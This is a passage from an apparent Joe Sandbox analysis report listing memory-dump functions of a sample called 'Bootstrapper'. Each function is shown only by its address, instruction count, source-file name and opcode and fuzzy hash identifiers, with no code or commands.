                                                                                          • Instruction Fuzzy Hash: E9414832E1CB9A5EE351B62CA4452F9B7D0FF95360F0447BFD08DC6493DE24A44A839A
                                                                                          Function 00007FF848C342F8 Relevance: .2, Instructions: 154COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 71389b1b89f5d3564853a034baa10934061a5c2acced5596a7e90ac1a16ba155
                                                                                          • Instruction ID: c193aa35c140f2e6e38bb44383664ed0be5f1510fb6e5c9507ed640eac9dde7d
                                                                                          • Opcode Fuzzy Hash: 71389b1b89f5d3564853a034baa10934061a5c2acced5596a7e90ac1a16ba155
                                                                                          • Instruction Fuzzy Hash: 7041CF32A0CA198FE7D4E76CA4997F977D1EF68761F04017BE00DC7296DE24AC068789
                                                                                          Function 00007FF848C3097F Relevance: .2, Instructions: 152COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 02331c2d2b0ce21fc981b6f71dccfded63ee4a95bb89097b67ffc81fb47d7c49
                                                                                          • Instruction ID: 17716f966a7d4fb086aecdb0c1683099b847b2776a2035b0ad7eff9f1a8a52b6
                                                                                          • Opcode Fuzzy Hash: 02331c2d2b0ce21fc981b6f71dccfded63ee4a95bb89097b67ffc81fb47d7c49
                                                                                          • Instruction Fuzzy Hash: 2D41F171A1DAC95FEB85F77844296BDBBE0EF49340F0405BED08ACB297DE289842C705
                                                                                          Function 00007FF848C491DA Relevance: .2, Instructions: 151COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1f15f5446f5615e55047f89c0f23f6d19d1c51c186c2a5e6222d00b0bc4b4f0
                                                                                          • Instruction ID: d4bb72de2efd3c8efc1503f8295321d508a780ca53f9c8544f65e246c485e41b
                                                                                          • Opcode Fuzzy Hash: c1f15f5446f5615e55047f89c0f23f6d19d1c51c186c2a5e6222d00b0bc4b4f0
                                                                                          • Instruction Fuzzy Hash: 3051C430A0C98A9FDB95EB2CC4997A87BE1FF59744F0501B9E44DD71A2CB28E889C741
                                                                                          Function 00007FF848C3AA60 Relevance: .1, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8880887a4d2e719a157d6a2d8ffaca1f9da1087fca3bdfadf6d8efdd293c9d32
                                                                                          • Instruction ID: a579bb45786d233b640d9f23b0b4f1ab47bcb308761744481bc3a413a1052baa
                                                                                          • Opcode Fuzzy Hash: 8880887a4d2e719a157d6a2d8ffaca1f9da1087fca3bdfadf6d8efdd293c9d32
                                                                                          • Instruction Fuzzy Hash: A641F63170C9494FD7D8EB2CA8147B9B7C2EF89351F4442BBE44CC7296DE6A58828781
                                                                                          Function 00007FF848C4439A Relevance: .1, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 75aa4da34df0d878e3051dca4ad6c648576433ab2f29372e8310d8210655717f
                                                                                          • Instruction ID: e06573fc6539a030cc3794776d79ae4ebbdb2167f56b8a35ba46960075ead8cc
                                                                                          • Opcode Fuzzy Hash: 75aa4da34df0d878e3051dca4ad6c648576433ab2f29372e8310d8210655717f
                                                                                          • Instruction Fuzzy Hash: 0E412720A0EAD90FD79AE73C54752787FE1EF4A694F1941FBD089CB1E3DA085C468352
                                                                                          Function 00007FF848C44DF0 Relevance: .1, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97ec4cffb4d5551c32b49c04e422af92d1e03558789ed7e62dd287c5159d07f0
                                                                                          • Instruction ID: 006ce352f08bb890dd0c7ce57a741387f609d894b4b016fb1342577a169e37ec
                                                                                          • Opcode Fuzzy Hash: 97ec4cffb4d5551c32b49c04e422af92d1e03558789ed7e62dd287c5159d07f0
                                                                                          • Instruction Fuzzy Hash: EC41ED30A1DE068FE799EB389485AB5B3D1FF94304F24456DD48AC3296DF29B882C784
                                                                                          Function 00007FF848C40D62 Relevance: .1, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2cca7207c6e926682b09ff9b40cb7a09c1d6eeadeab2455efa83e8d653201995
                                                                                          • Instruction ID: a73d20ffec6a077a27c95821650c51d2ce742fd66926e278239b9ca55158c027
                                                                                          • Opcode Fuzzy Hash: 2cca7207c6e926682b09ff9b40cb7a09c1d6eeadeab2455efa83e8d653201995
                                                                                          • Instruction Fuzzy Hash: 0A41F722F0DD898FE7D5FA2C68552B83BE1FF99A54F0800BAD08CD7297DE145C468345
                                                                                          Function 00007FF848C3D2A0 Relevance: .1, Instructions: 140COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ee3cb9c393a1a9ce63e25424735c38a5a5116dc8410c7114d9f78794e9d73cbe
                                                                                          • Instruction ID: 8f1d807cca4bcebe0be546a76a922ed4b028b48183185cb5e7c673d763c43775
                                                                                          • Opcode Fuzzy Hash: ee3cb9c393a1a9ce63e25424735c38a5a5116dc8410c7114d9f78794e9d73cbe
                                                                                          • Instruction Fuzzy Hash: 2641B43161CA468FDBD1EB2CC094AB577E2EF55340F1444BAD08EC7596CB29F846D750
                                                                                          Function 00007FF848C46A28 Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2bdbf06a70162769af12ddb6a5a8709e0311f1b3cfb3592d439d3a846a98bc3
                                                                                          • Instruction ID: 38320f9ad6c0f0df301f05192702c7cdd1c3d8518256d70e92fdf010507bb941
                                                                                          • Opcode Fuzzy Hash: a2bdbf06a70162769af12ddb6a5a8709e0311f1b3cfb3592d439d3a846a98bc3
                                                                                          • Instruction Fuzzy Hash: 9B41E33061CA498FE799EB288494AB577E1FF55740F1480BEC08AC7296CF69B886CB45
                                                                                          Function 00007FF848C3D310 Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19d8b52206b567a23b0a3c34a4d043556c7e3ebd72bf7a27845c71c47eabf767
                                                                                          • Instruction ID: fefb0d59d1a7909f4281381212e9d0bab40234299a2260146d5f9d24a267a614
                                                                                          • Opcode Fuzzy Hash: 19d8b52206b567a23b0a3c34a4d043556c7e3ebd72bf7a27845c71c47eabf767
                                                                                          • Instruction Fuzzy Hash: 9141B23061CA8A8FDBD5EB2CC090E7577E2EF58340B5449A9D08EC76A6CA25FC42D750
                                                                                          Function 00007FF848C3B21D Relevance: .1, Instructions: 125COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bbc3b785cc7230c2df4efd6315afeb04c790f67e0955d756ae1948f2073eddf6
                                                                                          • Instruction ID: 3a972775557330f50b775795e2b848b7ea7799139a968f9c717044ea63b634f5
                                                                                          • Opcode Fuzzy Hash: bbc3b785cc7230c2df4efd6315afeb04c790f67e0955d756ae1948f2073eddf6
                                                                                          • Instruction Fuzzy Hash: 9731F261A0E6C52FE396F77C58662B97FE0EF4A240B0905FEE0C9CB1A3C80958479365
                                                                                          Function 00007FF848C44310 Relevance: .1, Instructions: 125COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6cd47bd570355acd906c45f68da7902f37e6df38a03601f2d980a802fa8cdb25
                                                                                          • Instruction ID: cf18a279baa83f3971542492ad1a963e77b9c9454e744962c9e70b196494e817
                                                                                          • Opcode Fuzzy Hash: 6cd47bd570355acd906c45f68da7902f37e6df38a03601f2d980a802fa8cdb25
                                                                                          • Instruction Fuzzy Hash: 65310831A0EAD94FD7A6E73858246743FE0EF42694F1A41FBD489CB1E3DA085C45C396
                                                                                          Function 00007FF848C372A0 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66a9e0ea5ccaf7988b0d5123491349bfd14efc1d864a71a561ec5e5a224747b0
                                                                                          • Instruction ID: 4eea8e68892139c284178c2ed6db0e02e79cfd2dec2ad5c208c0040d135e0ac9
                                                                                          • Opcode Fuzzy Hash: 66a9e0ea5ccaf7988b0d5123491349bfd14efc1d864a71a561ec5e5a224747b0
                                                                                          • Instruction Fuzzy Hash: A1310521A1D84E0FD7A9EB2CA8583B97BD2EF89690F0402FBD44DC718ADE1858434391
                                                                                          Function 00007FF848C34308 Relevance: .1, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 63aff274678582d10a79d01492b176fca28a8d74ec7109dfbe430b33dc87e589
                                                                                          • Instruction ID: 41d04ac1e8c9551c53bf2e3bb52fb2b33a5599c3f9330eaf54b8552b13b89e2f
                                                                                          • Opcode Fuzzy Hash: 63aff274678582d10a79d01492b176fca28a8d74ec7109dfbe430b33dc87e589
                                                                                          • Instruction Fuzzy Hash: 2C31BE31A0CA198FEBD4EB6CA4997E977D1FF58350F0400BBE40DC7296DE24AC068785
                                                                                          Function 00007FF848C49240 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d3b2b77b95bb661afa6b4de44a33ee4eb8aad349afda59ba175148e76e2e79f0
                                                                                          • Instruction ID: 916a30b6500fd8db471a003d476b1f9bbac7dd36addf62d1d96014359b1722b2
                                                                                          • Opcode Fuzzy Hash: d3b2b77b95bb661afa6b4de44a33ee4eb8aad349afda59ba175148e76e2e79f0
                                                                                          • Instruction Fuzzy Hash: A7415D30A1C9599FDB95EF1CC899AA877E1FF59744F0102B9E44DD72A1CB38E885CB40
                                                                                          Function 00007FF848C4C131 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a5c8ae463bf28e20e1da80e237dc1d11eac4b3f4a2ab9d01c6a752c442274200
                                                                                          • Instruction ID: c86b7f5c4f67c8b8a05e426dd42303af49ab0ef70636a019660fc5b09f5fe125
                                                                                          • Opcode Fuzzy Hash: a5c8ae463bf28e20e1da80e237dc1d11eac4b3f4a2ab9d01c6a752c442274200
                                                                                          • Instruction Fuzzy Hash: FA31D47181CB885FDB54AF58DC065E9BBF4EB9A710F0401AFE88AD3152DB60B94587C3
                                                                                          Function 00007FF848C4A311 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 26ec371169b4dcbf6c30d90db4558418ddc604489826f4ea991cb88b6dec060a
                                                                                          • Instruction ID: ca5520d5a0b411b0e52a11a0ae8b96cf295167ff73b30bf2bc366e4887a7b145
                                                                                          • Opcode Fuzzy Hash: 26ec371169b4dcbf6c30d90db4558418ddc604489826f4ea991cb88b6dec060a
                                                                                          • Instruction Fuzzy Hash: A631EB52D0FAC10FE392E6683C151792FA0EF43A90B1C00FFD0848B19BFA089889834A
                                                                                          Function 00007FF848C3090E Relevance: .1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de60fbd2bc09bba327b13fb7e6f6fe2811b35e3fd466d3c738fbbfcfb9c23057
                                                                                          • Instruction ID: 0b97c00308b06d535f3566232eb021a9f977c95b1de94c60721459cb70accb35
                                                                                          • Opcode Fuzzy Hash: de60fbd2bc09bba327b13fb7e6f6fe2811b35e3fd466d3c738fbbfcfb9c23057
                                                                                          • Instruction Fuzzy Hash: 2331D861D0E6C95FE789F77844692B9BFE0EF49681F1404BEC089DB693DE295842C304
                                                                                          Function 00007FF848C40C41 Relevance: .1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fb05cc1697afc2582da8d47d7feb0a9e0d914c4659c5b4b1ffc17d778d33873
                                                                                          • Instruction ID: 275c3e4f4aa10c1fe1e60016a947e392252c67ac6bf219a8684479bcf1b73cd6
                                                                                          • Opcode Fuzzy Hash: 5fb05cc1697afc2582da8d47d7feb0a9e0d914c4659c5b4b1ffc17d778d33873
                                                                                          • Instruction Fuzzy Hash: AF31272495DAC55FDBC2FB3848606B67FE1EF97754F0800BAE088C7193CA185C56C382
                                                                                          Function 00007FF848C45BC2 Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 07c169ebcc5e0ff51ae3676a4af0c66b7eb9db6ed5755dcf9897f194ccf4dbb0
                                                                                          • Instruction ID: 10a0776014ed899afe22404508b458408708363571bd1995319cba3878b4d50c
                                                                                          • Opcode Fuzzy Hash: 07c169ebcc5e0ff51ae3676a4af0c66b7eb9db6ed5755dcf9897f194ccf4dbb0
                                                                                          • Instruction Fuzzy Hash: 81210532B0CA094FE7A9FA1C78561B877D1EF88661F14017FD18EC3192DE16A8874649
                                                                                          Function 00007FF848C3D591 Relevance: .1, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fa80b7652fdefaf536465ef00edcfd95f8e11b63469f382641b1601a4529beab
                                                                                          • Instruction ID: 7832447bd8c0e21c6b70f57ce85617de86d502433fb0e3ba1df321e80aba3992
                                                                                          • Opcode Fuzzy Hash: fa80b7652fdefaf536465ef00edcfd95f8e11b63469f382641b1601a4529beab
                                                                                          • Instruction Fuzzy Hash: 4911E722F0ED890FE3D6E92D2C5A17536D2EF59604B0900FBF50CC72A2EE44CC068345
                                                                                          Function 00007FF848C3D5B0 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c08619b4d2968d596fcd956bea1301623f2ac1737def92d651bf7b67658eb83
                                                                                          • Instruction ID: f37701e2d328b74d12b8a3848af2548ad58713d233de8eec139286d7553244fe
                                                                                          • Opcode Fuzzy Hash: 0c08619b4d2968d596fcd956bea1301623f2ac1737def92d651bf7b67658eb83
                                                                                          • Instruction Fuzzy Hash: 6D110222F0EC4D0FE3E9A92E2C5917536C2EB99655B0400BBF90CC32A5EE458C428244
                                                                                          Function 00007FF848C364E9 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 49626e337b47a6eb6a810ccce4dc619542bd92f54ebe8e0aadbd21c7d19851ca
                                                                                          • Instruction ID: e6a72766325dcc00a1b6ddf2966e35fcaef7c03e2cb130e2f4a9f2c6b4f2cf09
                                                                                          • Opcode Fuzzy Hash: 49626e337b47a6eb6a810ccce4dc619542bd92f54ebe8e0aadbd21c7d19851ca
                                                                                          • Instruction Fuzzy Hash: 6611E722E1DE8A4FD7D5E72894556B577E1FFA5240B4900BBC049CB2CADF18EC029341
                                                                                          Function 00007FF848C33376 Relevance: .1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8f49f636d2e0be38d181d4c70a6125f19df54c65b1a3122e24cca0ef2c3938fd
                                                                                          • Instruction ID: c130b68b707dac4e0fbe3ae7b25fc2d6221648d2c6c64ed6fba27e3e81bada91
                                                                                          • Opcode Fuzzy Hash: 8f49f636d2e0be38d181d4c70a6125f19df54c65b1a3122e24cca0ef2c3938fd
                                                                                          • Instruction Fuzzy Hash: 331127B1E0D8882FD391F77C84196A97BE2FF89350B0401FEE089C7192DA299C434341
                                                                                          Function 00007FF848C37350 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0698f0fb8ae8e59f4c6085495b755777d3cb0c517187d802bdfe462c8f408420
                                                                                          • Instruction ID: 18353f08521e31f2ed8a5a6d12feeaaa49bdcf18730baeab24fe052e6b11bda1
                                                                                          • Opcode Fuzzy Hash: 0698f0fb8ae8e59f4c6085495b755777d3cb0c517187d802bdfe462c8f408420
                                                                                          • Instruction Fuzzy Hash: 3111E330A18D496FDBC4FB2C84557BA7BE2EF98B40F14417AE009C3296CE24AC4643C1
                                                                                          Function 00007FF848C3516E Relevance: .1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1ab80c13b1e5977aa36d856cf248805756b85a9091a3d48df31274fe56c56ae
                                                                                          • Instruction ID: 52d52b104e877468a40fa8ece54941688572e9ee7572df7cde9f3eb91fee53b9
                                                                                          • Opcode Fuzzy Hash: b1ab80c13b1e5977aa36d856cf248805756b85a9091a3d48df31274fe56c56ae
                                                                                          • Instruction Fuzzy Hash: 0111A031C1EACD4FDB96EB7888591A97FE0EF16240F4804FBD448CB1A3EB695904C741
                                                                                          Function 00007FF848C334F5 Relevance: .1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ae485c15d19f32c27e454ef86b753a516b76c5a025e43991d753ed63bd263b7
                                                                                          • Instruction ID: cab467c973899c02a393f5e1d1314906c7fd501b50ef818a373cc4d89a12b64d
                                                                                          • Opcode Fuzzy Hash: 6ae485c15d19f32c27e454ef86b753a516b76c5a025e43991d753ed63bd263b7
                                                                                          • Instruction Fuzzy Hash: 0D01A230A1D9880FE3C4E62CA4993B4B7D1EF58356F5800BAD408C72A2DE1AAC818345
                                                                                          Function 00007FF848C38310 Relevance: .0, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8402b771a2f56f60ee4425a25041982ccea1c72a68dd4b8b9cd568a8a3f023ed
                                                                                          • Instruction ID: fc914e19d3521ee35b3bde4c60ff60b32c5d3e486e01dc53010d0bee032cc7f4
                                                                                          • Opcode Fuzzy Hash: 8402b771a2f56f60ee4425a25041982ccea1c72a68dd4b8b9cd568a8a3f023ed
                                                                                          • Instruction Fuzzy Hash: 3AF09022A2CD0E0FEBECE11C6059A3663E2DBE82A6B15017BD84DC32A5DE1598439248
                                                                                          Function 00007FF848C3CA3D Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8429478cb1ed2b4d027c0af82abb0f9c53a90801ec6b577d168b26d059bb78fd
                                                                                          • Instruction ID: d943303bbe24ea03dd117ebdb2c515180e282b9bcd6e34cbefbf1bcf7c8f19fd
                                                                                          • Opcode Fuzzy Hash: 8429478cb1ed2b4d027c0af82abb0f9c53a90801ec6b577d168b26d059bb78fd
                                                                                          • Instruction Fuzzy Hash: 8301D12191DAC64FE39AFB3864542B96BE1EF56244F0904FBC089C6286DE1868539346
                                                                                          Function 00007FF848C3447D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
